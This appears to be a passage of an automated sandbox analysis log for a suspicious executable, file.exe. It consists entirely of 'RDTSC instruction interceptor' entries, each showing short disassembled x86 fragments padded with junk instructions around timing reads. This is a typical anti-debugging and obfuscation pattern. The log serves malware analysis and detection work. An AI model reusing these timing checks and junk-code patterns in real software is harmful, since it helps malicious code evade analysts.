Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A957C second address: 8A9587 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jng 00007FA67D080296h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A9587 second address: 8A958F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A958F second address: 8A9597 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A9964 second address: 8A996E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FA67C81A866h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A9C23 second address: 8A9C3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push ebx 0x0000000a jc 00007FA67D080298h 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jg 00007FA67D080296h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8AA04D second address: 8AA057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8AA057 second address: 8AA05F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B0ADB second address: 8B0AE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FA67C81A866h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B0AE5 second address: 8B0B03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA67D0802A9h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B0B03 second address: 8B0B0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B0B0C second address: 8B0B29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA67D0802A9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B0B29 second address: 8B0B46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a jmp 00007FA67C81A871h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8AF706 second address: 8AF70E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8AF83A second address: 8AF849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA67C81A86Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B00AD second address: 8B00CF instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA67D08029Eh 0x00000008 push edx 0x00000009 pop edx 0x0000000a jnc 00007FA67D080296h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FA67D08029Dh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B00CF second address: 8B00EA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA67C81A873h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B0270 second address: 8B0278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B0431 second address: 8B0435 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B0435 second address: 8B043F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B043F second address: 8B048F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FA67C81A876h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FA67C81A86Ah 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FA67C81A874h 0x00000018 jmp 00007FA67C81A873h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8BA793 second address: 8BA7DA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 jc 00007FA67D080296h 0x0000000b pop ebx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jno 00007FA67D080296h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pushad 0x0000001b pushad 0x0000001c jmp 00007FA67D0802A0h 0x00000021 jg 00007FA67D080296h 0x00000027 jmp 00007FA67D08029Fh 0x0000002c popad 0x0000002d pushad 0x0000002e pushad 0x0000002f popad 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8BA0AA second address: 8BA0C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA67C81A86Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c js 00007FA67C81A866h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8BA209 second address: 8BA20D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8BA20D second address: 8BA216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8BA369 second address: 8BA37A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA67D08029Ch 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8BA4DF second address: 8BA4F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007FA67C81A866h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 jns 00007FA67C81A866h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8BA4F5 second address: 8BA4F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8BA4F9 second address: 8BA4FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C2961 second address: 8C2965 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C2965 second address: 8C296B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C296B second address: 8C2971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C2D2C second address: 8C2D6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 jo 00007FA67C81A866h 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 pushad 0x00000011 jmp 00007FA67C81A877h 0x00000016 jnp 00007FA67C81A866h 0x0000001c jmp 00007FA67C81A870h 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C2D6F second address: 8C2D82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA67D08029Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C2D82 second address: 8C2D88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C2EFD second address: 8C2F07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FA67D080296h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C2F07 second address: 8C2F12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C2F12 second address: 8C2F3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jmp 00007FA67D0802A6h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA67D08029Bh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86AA0B second address: 86AA84 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FA67C81A86Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d js 00007FA67C81A866h 0x00000013 mov ebx, dword ptr [ebp+1247ECADh] 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007FA67C81A868h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 00000016h 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 mov dword ptr [ebp+12453688h], eax 0x00000039 add eax, ebx 0x0000003b push 00000000h 0x0000003d push esi 0x0000003e call 00007FA67C81A868h 0x00000043 pop esi 0x00000044 mov dword ptr [esp+04h], esi 0x00000048 add dword ptr [esp+04h], 0000001Ch 0x00000050 inc esi 0x00000051 push esi 0x00000052 ret 0x00000053 pop esi 0x00000054 ret 0x00000055 mov dword ptr [ebp+122D280Dh], edx 0x0000005b or ch, FFFFFF86h 0x0000005e push eax 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86AA84 second address: 86AA88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86AA88 second address: 86AA92 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA67C81A866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86AA92 second address: 86AAD1 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA67D080298h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f cmc 0x00000010 push 00000004h 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007FA67D080298h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c mov dword ptr [ebp+122D29C3h], esi 0x00000032 nop 0x00000033 push eax 0x00000034 push edx 0x00000035 push edi 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86AAD1 second address: 86AAD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86AAD6 second address: 86AB01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA67D08029Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA67D0802A7h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C3208 second address: 8C321D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FA67C81A86Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C6B5D second address: 8C6B7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FA67D080296h 0x0000000a jnc 00007FA67D080296h 0x00000010 popad 0x00000011 jmp 00007FA67D0802A0h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C6B7E second address: 8C6B8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C6B8A second address: 8C6B8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8CA06A second address: 8CA085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007FA67C81A866h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007FA67C81A866h 0x00000015 jng 00007FA67C81A866h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8CA085 second address: 8CA0AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA67D0802A8h 0x00000007 jne 00007FA67D080296h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8CA0AD second address: 8CA0B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FA67C81A866h 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8CA0B8 second address: 8CA0C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FA67D080296h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8CA0C2 second address: 8CA0D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA67C81A86Bh 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8CA39F second address: 8CA3BF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FA67D0802A7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8CA524 second address: 8CA52E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FA67C81A866h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8CA52E second address: 8CA543 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA67D0802A7h 0x00000008 jmp 00007FA67D08029Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8CA6F8 second address: 8CA71A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b push esi 0x0000000c pop esi 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 pushad 0x00000011 jmp 00007FA67C81A86Bh 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 push esi 0x00000019 pop esi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8CA71A second address: 8CA71F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8CA71F second address: 8CA727 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8CA862 second address: 8CA877 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA67D0802A1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8CA877 second address: 8CA880 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8CA880 second address: 8CA8A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007FA67D0802A6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8CA8A1 second address: 8CA8E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA67C81A878h 0x00000009 popad 0x0000000a jmp 00007FA67C81A871h 0x0000000f jmp 00007FA67C81A874h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8CAA25 second address: 8CAA2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8CAA2C second address: 8CAA38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FA67C81A866h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8CAA38 second address: 8CAA3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D111F second address: 8D112F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA67C81A86Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D112F second address: 8D1139 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA67D080296h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D15A8 second address: 8D15AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D15AC second address: 8D15B2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D15B2 second address: 8D15BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D15BA second address: 8D15BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D15BE second address: 8D15C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D1852 second address: 8D1883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FA67D080296h 0x0000000a ja 00007FA67D0802B7h 0x00000010 jmp 00007FA67D08029Bh 0x00000015 jmp 00007FA67D0802A6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D1883 second address: 8D1889 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D1889 second address: 8D188F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D1B47 second address: 8D1B4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D1B4D second address: 8D1B57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D1E21 second address: 8D1E26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D1E26 second address: 8D1E2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D1E2B second address: 8D1E31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D1E31 second address: 8D1E60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FA67D080296h 0x0000000a popad 0x0000000b push eax 0x0000000c js 00007FA67D080296h 0x00000012 pop eax 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push edx 0x00000016 jmp 00007FA67D0802A2h 0x0000001b pushad 0x0000001c push edx 0x0000001d pop edx 0x0000001e push esi 0x0000001f pop esi 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D20DF second address: 8D20E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D20E5 second address: 8D20F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007FA67D080296h 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D20F6 second address: 8D211C instructions: 0x00000000 rdtsc 0x00000002 je 00007FA67C81A866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007FA67C81A868h 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 jno 00007FA67C81A866h 0x00000019 pushad 0x0000001a popad 0x0000001b pushad 0x0000001c popad 0x0000001d push edx 0x0000001e pop edx 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 push esi 0x00000023 pop esi 0x00000024 push ecx 0x00000025 pop ecx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D2C18 second address: 8D2C1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D767E second address: 8D76A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FA67C81A866h 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FA67C81A872h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D76A3 second address: 8D76A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D76A7 second address: 8D76B3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA67C81A866h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D7B87 second address: 8D7B9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA67D08029Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007FA67D080296h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D7D05 second address: 8D7D09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D7FE0 second address: 8D7FEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jns 00007FA67D080296h 0x0000000c rdtsc
